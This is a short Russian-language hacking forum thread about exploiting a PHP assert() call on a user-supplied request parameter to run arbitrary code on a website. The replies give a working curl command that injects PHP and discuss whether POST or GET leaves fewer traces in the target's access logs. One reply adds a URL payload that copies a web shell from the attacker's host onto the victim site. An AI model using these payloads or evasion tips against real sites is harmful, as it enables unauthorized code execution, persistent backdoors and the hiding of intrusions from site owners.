Допустим в php файле на сайте есть строка вида: PHP: assert($_REQUEST[123123123); Как можно раскрутить это? С PHP плохо знаком, но шестое чувство подсказывает что он получает запрос на переменную 123123123 и выполняет PHP код (assert). Как можно написать PHP скрипт чтобы использовать данную уязвимость ? Какой код лучше заливать?
в параметр 123123123 пишешь пхп код, он выполняется curl 'http://site.ru/' --data '123123123=phpinfo();'
а пост беспалевно? вот тебе выдерка из access log xx.xx.xx.xxx - - [xx/Apr/xx:xx:xx:xx-0500] "POST /yourfile.php HTTP/1.1" 200 44
вот тебе выдержка из access log xx.xx.xx.xxx - - [xx/Apr/xx:xx:xx:xx-0500] "GET /yourfile.php?123123123=phpinfo(); HTTP/1.1" 200 44 сам ответь что беспалевней
Code: site.com/file.php?123123123=copy("http://mysite.com/shell.txt","shell.php"); зальётся по пути site.com/shell.php